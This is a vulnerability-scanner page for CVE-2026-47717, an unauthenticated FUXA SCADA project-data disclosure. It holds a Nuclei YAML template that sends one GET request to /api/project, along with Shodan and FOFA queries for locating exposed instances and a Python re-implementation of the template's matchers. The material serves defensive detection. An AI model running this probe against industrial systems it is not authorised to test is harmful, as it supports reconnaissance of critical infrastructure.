FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure
CVE-2026-47717
Early Release
Description
FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
Severity
High
CVSS Score
7.5
Affected Product
fuxa
Published Date
June 18, 2026
Template Author
pussycat0x
CVE-2026-47717.yaml
id: CVE-2026-47717

info:
  name: FUXA 1.3.0 - Unauthenticated ICS/SCADA Project Data Disclosure
  author: pussycat0x
  severity: high
  description: |
    FUXA v1.3.0 exposes full SCADA/HMI project configuration via GET /api/project without authentication, even when secureEnabled is true. The secureFnc middleware auto-generates
    a valid guest JWT when no token is provided, bypassing authentication. Exposed data includes server-side scripts, device configs, HMI views, and alarm definitions.
  remediation: |
    Upgrade to fuxa-server version 1.3.1 or later.
  reference:
    - https://github.com/advisories/GHSA-q3w6-q3hc-c5x6
    - https://www.miggo.io/vulnerability-database/cve/CVE-2026-47717
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-47717
    cwe-id: CWE-201
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    shodan-query: http.title:"FUXA"
    fofa-query: title="FUXA"
  tags: cve,cve2026,fuxa,ics,scada,unauth,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/project"

    headers:
      Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'application/json')"
          - "contains_all(body, 'scripts','id')"
          - "contains_any(body, 'devices','hmi','alarms','views','variables')"
        condition: and
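The template's four matcher conditions, re-implemented as an added Python example (not part of the template or of the FUXA project) so a defender can check offline whether a response captured from their own FUXA instance would trip this detection. The three responses below are constructed samples, not captures from a real host.

```python
# Constructed sample responses (not from a real FUXA host).
# A 200 JSON reply carrying the project object: what an exposed instance looks like.
EXPOSED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json; charset=utf-8\r\n"
    "\r\n"
    '{"id":"proj-1","devices":[{"id":"dev1"}],"hmi":{"views":[]},'
    '"scripts":[{"id":"s1","code":"return 1;"}],"alarms":[]}'
)
# A patched instance rejecting the tokenless request.
REJECTED_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"message":"Unauthorized"}'
)
# Some other JSON endpoint: 200 and JSON, but not a project object.
OTHER_JSON_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"status":"ok","version":"1.3.1"}'
)


def split_response(raw: str):
    """Split a raw HTTP/1.x response into (status_code, header_block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, _, header_block = head.partition("\r\n")
    status_code = int(status_line.split()[1])
    return status_code, header_block, body


def matches_cve_2026_47717(raw: str) -> bool:
    """Evaluate the template's DSL matchers (condition: and) on one response.

    Mirrors nuclei's case-sensitive substring semantics: contains() on the
    header block, contains_all()/contains_any() on the body.
    """
    status_code, header, body = split_response(raw)
    return (
        status_code == 200
        and "application/json" in header
        and all(tok in body for tok in ("scripts", "id"))
        and any(tok in body for tok in ("devices", "hmi", "alarms", "views", "variables"))
    )
```

The `'id'` token is weak on its own, so the `contains_all`/`contains_any` pair is what keeps generic JSON replies from matching; review a positive hit against the actual body before treating it as confirmed exposure.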
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID: CVE-2026-47717
CWE ID: CWE-201
Remediation Steps
Upgrade to fuxa-server version 1.3.1 or later.